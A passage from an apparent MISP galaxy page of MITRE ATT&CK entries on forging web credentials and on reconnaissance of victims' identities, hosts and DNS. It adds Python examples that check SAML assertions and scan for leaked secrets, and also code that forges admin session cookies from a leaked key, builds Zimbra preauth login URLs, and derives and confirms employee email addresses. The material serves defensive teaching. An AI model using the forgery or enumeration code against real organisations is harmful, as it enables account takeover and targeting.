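                     max_lifetime: timedelta = MAX_LIFETIME) -> List[str]:
    """Return policy findings for the assertion; an empty list means it passed these checks."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    conditions = root.find("saml:Conditions", NS)
    if conditions is None:
        return ["missing Conditions element"]
    not_before = parse_utc(conditions.get("NotBefore"))
    not_on_or_after = parse_utc(conditions.get("NotOnOrAfter"))
    lifetime = not_on_or_after - not_before
    if lifetime > max_lifetime:
        findings.append(f"lifetime {lifetime} exceeds policy maximum {max_lifetime}")
    if not (not_before <= now < not_on_or_after):
        findings.append("assertion is outside its validity window")
    cert = root.find(".//ds:X509Certificate", NS)
    if cert is None or not cert.text:
        findings.append("no signing certificate present")
    elif cert_fingerprint(cert.text) not in trusted_fingerprints:
        findings.append("signing certificate fingerprint is not in the trusted set")
    return findings


# Constructed inputs: a normal one-hour assertion and a long-lived one signed by an unknown cert.
NOW = datetime(2024, 1, 1, 12, 30, tzinfo=timezone.utc)
GOOD_ASSERTION = build_assertion("2024-01-01T12:00:00Z", "2024-01-01T13:00:00Z", TRUSTED_CERT_B64)
LONG_LIVED_ASSERTION = build_assertion("2024-01-01T00:00:00Z", "2025-01-01T00:00:00Z", ROGUE_CERT_B64)

if __name__ == "__main__":
    print("good:", assess_assertion(GOOD_ASSERTION, TRUSTED_FINGERPRINTS, NOW))
    print("long-lived:", assess_assertion(LONG_LIVED_ASSERTION, TRUSTED_FINGERPRINTS, NOW))
```

The fingerprint comparison is the part that matters for the second scenario on the page: an attacker who registers their own AD FS trust brings a certificate that signs correctly but was never in the relying party's pinned set, so an allow-list of known signing certificates catches it even though the signature verifies.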

Internal MISP references

UUID dc0aecef-3cb2-4381-b6e4-dfa7be16d42b which can be used as unique global reference for SAML Tokens in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1606.002

Web Cookies

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from Steal Web Session Cookie and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.[Pass The Cookie] The generation of web cookies often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources (Web Session Cookie), which may bypass multi-factor and other authentication protection mechanisms.[Volexity SolarWinds][Pass The Cookie][Unit 42 Mac Crypto Cookies January 2019]

Internal MISP references

UUID b0966c0f-1e09-4d5d-acff-0ca79dc9da89 which can be used as unique global reference for Web Cookies in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1606.001

Forge Web Credentials

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.[GitHub AWS-ADFS-Credential-Generator] Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., Temporary Elevated Cloud Access), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.[AWS Temporary Security Credentials][Zimbra Preauth]

Once forged, adversaries may use these web credentials to access resources (ex: Use Alternate Authentication Material), which may bypass multi-factor and other authentication protection mechanisms.[Pass The Cookie][Unit 42 Mac Crypto Cookies January 2019][Microsoft SolarWinds Customer Guidance]
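The block below is an added example serving both the Web Cookies and Forge Web Credentials entries; it is not code from this page, MITRE, Tidal Cyber, Zimbra or any web framework. It shows the two forgeries the text describes, a signed session cookie minted with a leaked application secret and a Zimbra-style preauth token computed from a domain preauth key, alongside the server-side checks that bound the damage: HMAC verification (so a payload edited without the key fails) and key rotation (so anything signed with a retired key dies with it). The secrets, account names and hostname are constructed; the preauth string layout follows the Zimbra preauth documentation cited above, and its exact form should be treated as an assumption of this example.

```python
"""Forging web credentials from a leaked secret, and the checks that contain it.
Added example; not MITRE/Tidal/Zimbra/framework code. All keys, accounts and the
hostname are constructed. The preauth layout follows Zimbra's documentation and
is an assumption of this example."""
import base64
import hashlib
import hmac
import json
from urllib.parse import urlencode


def _b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_session_cookie(claims: dict, key: bytes, key_id: str) -> str:
    """What the app does at login: kid.payload.signature, HMAC-SHA256 over the payload.
    Anyone holding `key` can run this for any claims; that is the forgery."""
    payload = _b64u(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    return f"{key_id}.{payload}.{_b64u(sig)}"


def verify_session_cookie(cookie: str, keyring: dict, now: int):
    """Accept only cookies signed by a key still in the ring and not yet expired."""
    try:
        key_id, payload, sig = cookie.split(".")
    except ValueError:
        return None
    key = keyring.get(key_id)
    if key is None:                      # rotated-out key: forgeries made with it die too
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64u_decode(sig)):
        return None
    claims = json.loads(_b64u_decode(payload))
    if claims.get("exp", 0) <= now:
        return None
    return claims


def zimbra_preauth(account: str, preauth_key: str, timestamp_ms: int, expires: int = 0) -> str:
    """Preauth value as Zimbra documents it: HMAC-SHA1(key, "account|by|expires|timestamp"), hex.
    The domain key from `zmprov gdpak` lets its holder compute this for any account in the domain."""
    msg = f"{account}|name|{expires}|{timestamp_ms}".encode()
    return hmac.new(preauth_key.encode(), msg, hashlib.sha1).hexdigest()


def zimbra_preauth_url(host: str, account: str, preauth_key: str, timestamp_ms: int) -> str:
    """The redirect a user (or attacker) would follow to be logged in as `account`."""
    token = zimbra_preauth(account, preauth_key, timestamp_ms)
    query = urlencode({"account": account, "by": "name", "timestamp": timestamp_ms,
                       "expires": 0, "preauth": token})
    return f"https://{host}/service/preauth?{query}"


def demo() -> dict:
    """Forge an admin cookie with a leaked key; show the tamper and rotation checks."""
    now = 1_700_000_000
    leaked = {"k1": b"constructed-leaked-app-secret"}
    forged = sign_session_cookie({"sub": "admin", "role": "admin", "exp": now + 3600}, leaked["k1"], "k1")
    key_id, _payload, sig = forged.split(".")
    # Payload changed without re-signing: the HMAC no longer matches.
    inflated = json.dumps({"sub": "admin", "role": "admin", "exp": now + 10**6})
    tampered = f"{key_id}.{_b64u(inflated.encode())}.{sig}"
    return {
        "accepted": verify_session_cookie(forged, leaked, now),
        "tampered": verify_session_cookie(tampered, leaked, now),
        "after_rotation": verify_session_cookie(forged, {"k2": b"constructed-new-secret"}, now),
        "preauth_url": zimbra_preauth_url("mail.corp.example", "alice@corp.example",
                                          "constructed-domain-preauth-key", now * 1000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The point of the keyring with key identifiers is operational: when a signing secret or a `zmprov gdpak` key is suspected leaked, rotating it is the only way to invalidate forged material, because the server has no list of sessions it never issued.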

Internal MISP references

UUID d8507187-cea6-4be2-95b4-e875924e58c0 which can be used as unique global reference for Forge Web Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE

Client Configurations

Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID bc4f11b1-fd06-4e49-be48-e73ece82f1a9 which can be used as unique global reference for Client Configurations in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.004

Firmware

Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).[ArsTechnica Intel] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or Exploit Public-Facing Application).

Internal MISP references

UUID 8af6a9ee-c323-44fa-85d3-29366fd1bb4f which can be used as unique global reference for Firmware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.003

Hardware

Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: hostnames, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Compromise Hardware Supply Chain or Hardware Additions).

Internal MISP references

UUID a5ab5108-1582-4357-b948-1c6148c7b5ce which can be used as unique global reference for Hardware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.001

Software

Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or for initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID 77476b73-f4d1-4689-8f9e-af08d27f4cba which can be used as unique global reference for Software in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.002

Gather Victim Host Information

Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID 4acf57da-73c1-4555-a86a-38ea4a8b962d which can be used as unique global reference for Gather Victim Host Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Credentials

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via Phishing for Information. Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.[ATT ScanBox] Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: Search Engines, breach dumps, code repositories, etc.).[Register Deloitte][Register Uber][Detectify Slack Tokens][Forbes GitHub Creds][GitHub truffleHog][GitHub Gitrob][CNET Leaks] Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).[Okta Scatter Swine 2022]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: External Remote Services or Valid Accounts).
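The scanner below is an added example, not code from this page, MITRE, Tidal Cyber or truffleHog, of the code-repository leak channel the entry cites: named patterns for well-known token shapes plus a Shannon-entropy test for generic secrets, which is the approach truffleHog-style tools take. The sample file is constructed (the AWS values are Amazon's public documentation examples, not live keys), the pattern list is a small illustrative subset, and the entropy cut-off is an assumed starting value to tune per corpus.

```python
"""Secret scanning over committed text. Added example; not truffleHog/MITRE/Tidal code.
SAMPLE_ENV is constructed; the AWS values are Amazon's documentation examples."""
import math
import re

NAMED_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "slack_token": re.compile(r"\bxox[abprs]-[0-9A-Za-z-]{10,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----"),
}
# Generic candidates: long runs of base64/url-safe characters. '=' is excluded so
# KEY=VALUE lines split into a key part and a value part.
GENERIC_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{20,}")
ENTROPY_THRESHOLD = 4.0   # bits per character; assumed cut-off, tune per corpus

SAMPLE_ENV = """# constructed sample, not a real leak
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
SLACK_TOKEN=xoxb-123456789012-1234567890123-AbCdEfGhIjKlMnOpQrStUvWx
LOG_LEVEL=debug
-----BEGIN RSA PRIVATE KEY-----
"""


def shannon_entropy(text: str) -> float:
    """Bits per character; random base64 sits well above 4, identifiers well below."""
    length = len(text)
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum((n / length) * math.log2(n / length) for n in counts.values())


def redact(secret: str) -> str:
    """Never echo a whole secret into a finding, a ticket or a log line."""
    return secret[:4] + "..." + secret[-2:] if len(secret) > 8 else "..."


def scan_text(text: str) -> list:
    """Return one finding per hit: named-pattern hits first, then generic high-entropy strings
    that no named pattern already covered on that line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        covered = set()
        for kind, pattern in NAMED_PATTERNS.items():
            for m in pattern.finditer(line):
                covered.add(m.group(0))
                findings.append({"kind": kind, "line": line_no, "preview": redact(m.group(0))})
        for m in GENERIC_TOKEN.finditer(line):
            token = m.group(0)
            if token in covered:
                continue
            entropy = shannon_entropy(token)
            if entropy >= ENTROPY_THRESHOLD:
                findings.append({"kind": "high_entropy_string", "line": line_no,
                                 "entropy": round(entropy, 2), "preview": redact(token)})
    return findings


if __name__ == "__main__":
    for finding in scan_text(SAMPLE_ENV):
        print(finding)
```

Note what the entropy test does and does not catch on the sample: `AWS_SECRET_ACCESS_KEY` as an identifier scores around 3 bits per character and is ignored, while its 40-character value scores above 4.6 and is flagged even though no named pattern knows its shape. Running the same scan over every commit in a repository's history, not just the working tree, is what makes it useful against leaks that were "fixed" by a later commit.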

Internal MISP references

UUID e5d9c785-61bd-483f-b2ac-5bd9a8641b22 which can be used as unique global reference for Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.001

Email Addresses

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[HackersArise Email][CNET Leaks] Email addresses could also be enumerated via more active means (i.e. Active Scanning), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[GrimBlog UsernameEnum] For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.[GitHub Office 365 User Enumeration][Azure Active Directory Reconnaisance]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Email Accounts), and/or initial access (ex: Phishing or Brute Force via External Remote Services).

Internal MISP references

UUID 2eee984c-ea00-4284-b3eb-fd0c603a5a80 which can be used as unique global reference for Email Addresses in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.002

Employee Names

Adversaries may gather employee names that can be used during targeting. Employee names can be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[OPM Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).
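The block below is an added example serving both the Email Addresses and Employee Names entries; it is not code from this page, MITRE, Tidal Cyber or Microsoft. It works the derivation step offline: infer the organisation's address format from the few name/address pairs that leak in public data sets, render the remaining gathered names in that format, and classify constructed Office 365 GetCredentialType-style JSON bodies so that a throttled answer is never mistaken for a verdict. The names, domain and JSON bodies are constructed; the IfExistsResult meanings follow what public enumeration tooling documents for that endpoint and are an assumption of this example.

```python
"""Deriving addresses from employee names and reading username-enumeration answers.
Added example; not MITRE/Tidal/Microsoft code. Names, domain and JSON are constructed;
the IfExistsResult mapping is taken from public tooling and is an assumption."""
import json
import unicodedata

ADDRESS_FORMATS = {
    "first.last": "{first}.{last}",
    "flast": "{f}{last}",
    "firstl": "{first}{l}",
    "first_last": "{first}_{last}",
    "last.first": "{last}.{first}",
}

# Assumed meanings of IfExistsResult in a GetCredentialType response (from public tooling).
IF_EXISTS_RESULT = {0: "exists", 1: "unknown", 5: "exists_external_idp", 6: "exists"}


def _ascii_lower(text: str) -> str:
    """Fold accents and drop anything that is not a letter: 'O'Brien' -> 'obrien'."""
    folded = unicodedata.normalize("NFKD", text).encode("ascii", "ignore").decode()
    return "".join(ch for ch in folded.lower() if ch.isalpha())


def split_name(full_name: str):
    parts = full_name.split()
    return _ascii_lower(parts[0]), _ascii_lower(parts[-1])


def render(fmt: str, full_name: str, domain: str) -> str:
    first, last = split_name(full_name)
    local = ADDRESS_FORMATS[fmt].format(first=first, last=last, f=first[0], l=last[0])
    return f"{local}@{domain}"


def infer_format(known) -> list:
    """Given (name, address) pairs seen in public data, return every format consistent with all of them."""
    consistent = set(ADDRESS_FORMATS)
    for full_name, address in known:
        address = address.lower()
        domain = address.partition("@")[2]
        consistent &= {fmt for fmt in ADDRESS_FORMATS if render(fmt, full_name, domain) == address}
    return sorted(consistent)


def candidate_addresses(names, domain: str, fmt: str) -> list:
    return [render(fmt, name, domain) for name in names]


def classify_getcredentialtype(body: str) -> str:
    """Map one JSON response body to exists / unknown / throttled / unrecognized."""
    data = json.loads(body)
    if data.get("ThrottleStatus"):
        return "throttled"   # back off; the IfExistsResult in a throttled reply is not trustworthy
    return IF_EXISTS_RESULT.get(data.get("IfExistsResult"), "unrecognized")


if __name__ == "__main__":
    # Constructed: two pairs scraped from public sources fix the format, the rest follow it.
    seen = [("Jane Doe", "jane.doe@corp.example"), ("José Núñez", "jose.nunez@corp.example")]
    fmt = infer_format(seen)[0]
    print(fmt, candidate_addresses(["Sam O'Brien", "Priya Raman"], "corp.example", fmt))
    print(classify_getcredentialtype('{"IfExistsResult": 0, "ThrottleStatus": 0}'))
```

Defensively, the same classifier is the reason to alert on bursts of GetCredentialType or autodiscover requests from a single source: each one returns a per-account verdict without any authentication attempt, so sign-in failure logs alone will not show the enumeration.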

Internal MISP references

UUID 72668851-bf65-42eb-a775-bc607f4520a2 which can be used as unique global reference for Employee Names in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1589.003

Gather Victim Identity Information

Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about users could also be enumerated via other active means (i.e. Active Scanning) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.[GrimBlog UsernameEnum] Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[OPM Leak][Register Deloitte][Register Uber][Detectify Slack Tokens][Forbes GitHub Creds][GitHub truffleHog][GitHub Gitrob][CNET Leaks]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Internal MISP references

UUID aea36489-047e-4c4a-ab26-c51fd3556182 which can be used as unique global reference for Gather Victim Identity Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

DNS

Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Records such as MX, TXT, and SPF (itself published as a TXT record) may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.[Sean Metcalf Twitter DNS Records]

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS. DNS information may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Active Scanning), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).
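The profiler below is an added example, not code from this page, MITRE, Tidal Cyber or DNSDumpster. It reads a domain's MX, SPF/TXT and CNAME records for the third-party providers they reveal, and at the same time reports the mail-security weaknesses a defender would want to know about (a permissive SPF `all` qualifier, a DMARC policy of `p=none`). The zone excerpt is constructed rather than looked up; the provider hostnames in PROVIDER_HINTS are well-known published values, but which of them any real domain uses is unknown here.

```python
"""Provider and posture inference from public DNS records.
Added example; not MITRE/Tidal/DNSDumpster code. RECORDS is a constructed zone excerpt."""

# (record type the hint applies to, substring to look for, what it indicates)
PROVIDER_HINTS = [
    ("MX", "mail.protection.outlook.com", "Microsoft 365"),
    ("MX", "aspmx.l.google.com", "Google Workspace"),
    ("SPF", "spf.protection.outlook.com", "Microsoft 365"),
    ("SPF", "_spf.google.com", "Google Workspace"),
    ("SPF", "_spf.salesforce.com", "Salesforce"),
    ("SPF", "mail.zendesk.com", "Zendesk"),
    ("TXT", "MS=", "Microsoft 365 domain verification"),
    ("TXT", "google-site-verification=", "Google domain verification"),
    ("TXT", "docusign=", "DocuSign"),
    ("CNAME", "enterpriseregistration.windows.net", "Azure AD device registration"),
    ("CNAME", "autodiscover.outlook.com", "Microsoft 365 Autodiscover"),
    ("CNAME", ".zendesk.com", "Zendesk help center"),
]

# Constructed zone excerpt: (owner name, type, rdata)
RECORDS = [
    ("corp.example", "MX", "0 corp-example.mail.protection.outlook.com."),
    ("corp.example", "TXT", "v=spf1 include:spf.protection.outlook.com include:_spf.salesforce.com include:mail.zendesk.com ~all"),
    ("corp.example", "TXT", "MS=ms12345678"),
    ("corp.example", "TXT", "docusign=0123abcd-constructed"),
    ("_dmarc.corp.example", "TXT", "v=DMARC1; p=none; rua=mailto:dmarc@corp.example"),
    ("autodiscover.corp.example", "CNAME", "autodiscover.outlook.com."),
    ("enterpriseregistration.corp.example", "CNAME", "enterpriseregistration.windows.net."),
    ("support.corp.example", "CNAME", "corp.zendesk.com."),
]


def parse_spf(txt: str):
    """Return (include targets, qualifier of the 'all' mechanism) for a v=spf1 record, else None.
    The qualifier is '+', '-', '~' or '?' ('+' when written as bare 'all'); None if absent."""
    if not txt.lower().startswith("v=spf1"):
        return None
    includes, all_qualifier = [], None
    for term in txt.split()[1:]:
        if term.lower().startswith("include:"):
            includes.append(term[len("include:"):].rstrip("."))
        elif term.lower().endswith("all"):
            all_qualifier = term[:-3] or "+"
    return includes, all_qualifier


def profile(records) -> dict:
    """Providers in use, SPF includes, and mail-spoofing weaknesses visible from DNS alone."""
    providers, weaknesses, spf_includes = set(), [], []
    for owner, rtype, rdata in records:
        value = rdata.rstrip(".").lower()
        if rtype == "MX":
            value = value.split()[-1]            # drop the preference number
        if rtype == "TXT" and value.startswith("v=spf1"):
            includes, all_qualifier = parse_spf(rdata)
            spf_includes.extend(includes)
            for include in includes:
                for kind, needle, name in PROVIDER_HINTS:
                    if kind == "SPF" and include.lower().endswith(needle):
                        providers.add(name)
            if all_qualifier in ("+", "?"):
                weaknesses.append(f"{owner}: SPF '{all_qualifier}all' lets any host send as the domain")
            elif all_qualifier == "~":
                weaknesses.append(f"{owner}: SPF ends in softfail (~all) only")
            elif all_qualifier is None:
                weaknesses.append(f"{owner}: SPF has no 'all' mechanism")
            continue
        if rtype == "TXT" and owner.startswith("_dmarc."):
            tags = dict(t.strip().split("=", 1) for t in rdata.split(";") if "=" in t)
            if tags.get("p", "none").strip().lower() == "none":
                weaknesses.append(f"{owner}: DMARC p=none does not block spoofed mail")
            continue
        for kind, needle, name in PROVIDER_HINTS:
            if kind == rtype and needle.lower() in value:
                providers.add(name)
    return {"providers": sorted(providers), "spf_includes": spf_includes, "weaknesses": weaknesses}


if __name__ == "__main__":
    for key, val in profile(RECORDS).items():
        print(key, "->", val)
```

Every input here is public by design, so the same script run against your own domains shows exactly what an adversary sees; the weaknesses list is the part worth fixing before the providers list is used against you in a phishing pretext.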

Internal MISP references

UUID cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809 which can be used as unique global reference for DNS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.002

Domain Properties

Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: WHOIS).[WHOIS][DNS Dumpster][Circl Passive DNS] Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.[Azure Active Directory Reconnaisance][Office 265 Azure Domain Availability] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Phishing).

Internal MISP references

UUID ec145032-4b1b-4dbe-85bf-47360e35b0a3 which can be used as unique global reference for Domain Properties in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.001

IP Addresses

Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[WHOIS][DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID 5c3c8da1-ed0c-4b79-9794-c2fc55588ad9 which can be used as unique global reference for IP Addresses in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.005

Network Security Appliances

Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information.[Nmap Firewalls NIDS] Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb which can be used as unique global reference for Network Security Appliances in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.006

Network Topology

